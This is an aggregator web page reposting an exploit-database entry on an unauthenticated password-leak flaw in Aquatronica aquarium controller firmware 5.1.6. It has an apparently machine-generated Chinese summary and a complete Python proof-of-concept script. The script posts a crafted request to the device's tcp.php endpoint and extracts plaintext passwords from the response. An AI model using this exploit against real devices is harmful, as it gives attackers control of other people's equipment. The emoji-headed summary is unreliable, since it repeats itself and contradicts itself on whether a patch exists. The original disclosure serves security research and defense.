The Exploit Database - CXSecurity.com 2024年07月05日
Aquatronica Control System 5.1.6 Password Disclosure
index_new5.html
../../../zaker_core/zaker_tpl_static/wap/tpl_guoji1.html

 

Aquatronica 控制系统 5.1.6 版本存在一个严重漏洞,允许攻击者通过网络发送 POST 请求获取敏感配置信息,包括明文密码。攻击者可以利用该漏洞获得对设备的未经授权的访问和控制,从而危及设备安全并可能导致攻击者操纵设备设置。

😨 **漏洞概述:** Aquatronica 控制系统 5.1.6 版本的 `tcp.php` 端点暴露在网络上,未经身份验证的攻击者可以访问该端点。攻击者可以发送 POST 请求,获取敏感的配置信息,包括明文密码。

😥 **影响:** 攻击者可以利用该漏洞获取对 Aquatronica 控制系统的未经授权的访问和控制,从而危及设备安全。攻击者可以更改设备设置,例如修改密码、更改设备配置或关闭设备。

😔 **解决方法:** Aquatronica 尚未发布针对该漏洞的补丁。建议用户更新到最新版本的固件或使用其他安全措施来保护设备。

😩 **建议:** 用户应及时更新到最新版本的固件,并使用强密码来保护设备。用户还应启用设备上的所有安全功能,例如防火墙和入侵检测系统。

😭 **漏洞细节:** 该漏洞是由于 `tcp.php` 端点未对用户进行身份验证导致的。攻击者可以发送 POST 请求,该请求包含 `function_id` 和 `command` 参数。该端点会返回包含敏感配置信息的响应,包括明文密码。

🤯 **攻击方法:** 攻击者可以通过扫描网络查找运行 Aquatronica 控制系统的设备。一旦找到设备,攻击者就可以发送 POST 请求来获取敏感信息。

😱 **安全建议:** 用户应及时更新到最新版本的固件,并使用强密码来保护设备。用户还应启用设备上的所有安全功能,例如防火墙和入侵检测系统。

🤬 **漏洞修复:** Aquatronica 正在开发针对该漏洞的补丁。建议用户关注 Aquatronica 官方网站以获取最新信息。

😡 **攻击影响:** 该漏洞可能会导致攻击者控制 Aquatronica 控制系统,从而对设备造成重大损害。

😠 **安全措施:** 用户应及时更新到最新版本的固件,并使用强密码来保护设备。用户还应启用设备上的所有安全功能,例如防火墙和入侵检测系统。

!/usr/bin/env python# -- coding: utf-8 --### Aquatronica Control System 5.1.6 Passwords Leak Vulnerability### Vendor: Aquatronica s.r.l.# Product web page: https://www.aquatronica.com# Affected version: Firmware: 5.1.6# Web: 2.0## Summary: Aquatronica's electronic AQUARIUM CONTROLLER is easy# to use, allowing you to control all the electrical devices in# an aquarium and to monitor all their parameters; it can be used# for soft water aquariums, salt water aquariums or both simultaneously.## Desc: The tcp.php endpoint on the Aquatronica controller is exposed# to unauthenticated attackers over the network. This vulnerability# allows remote attackers to send a POST request which can reveal# sensitive configuration information, including plaintext passwords.# This can lead to unauthorized access and control over the aquarium# controller, compromising its security and potentially allowing attackers# to manipulate its settings.## Tested on: Apache/2.0.54 (Unix)# PHP/5.4.17### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic# @zeroscience### Advisory ID: ZSL-2024-5824# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5824.php### 04.05.2024#import requests, html, re, sys, timefrom urllib.parse import unquoteprogram = "TCP"command = "ws_get_network_cfg"function_id = "TCP_XMLREQUEST"print("""____ . .(.. _ , |\ /|\ O \ /| \ \/ /___ \/ | \ /vvvv\ \ | / |\^^^^ == _/ |`_ === . |/ /_ \ / ||/ _ | / ______/____aquatronica_0day___| || || |""")if len(sys.argv) != 2:print("Usage: python aqua.py <ip:port>")sys.exit(1)ip = sys.argv[1]url = f"http://{ip}/{program.lower()}.php"post_data = {'function_id' : function_id.lower(),'command' : command.upper()}r = requests.post(url, data=post_data)if r.status_code == 200:r_d = unquote(r.text)f_d_r = html.unescape(r_d)regex = r'pwd="([^"]+)"'rain = re.findall(regex, f_d_r)for drops in rain:print(' ',drops)time.sleep(0.5)else:print(f"Dry season! {r.status_code}")

Fish AI Reader

Fish AI Reader

AI辅助创作,多种专业模板,深度分析,高质量内容生成。从观点提取到深度思考,FishAI为您提供全方位的创作支持。新版本引入自定义参数,让您的创作更加个性化和精准。

FishAI

FishAI

鱼阅,AI 时代的下一个智能信息助手,助你摆脱信息焦虑

联系邮箱 441953276@qq.com

相关标签

Aquatronica 漏洞 安全 密码泄露 攻击
相关文章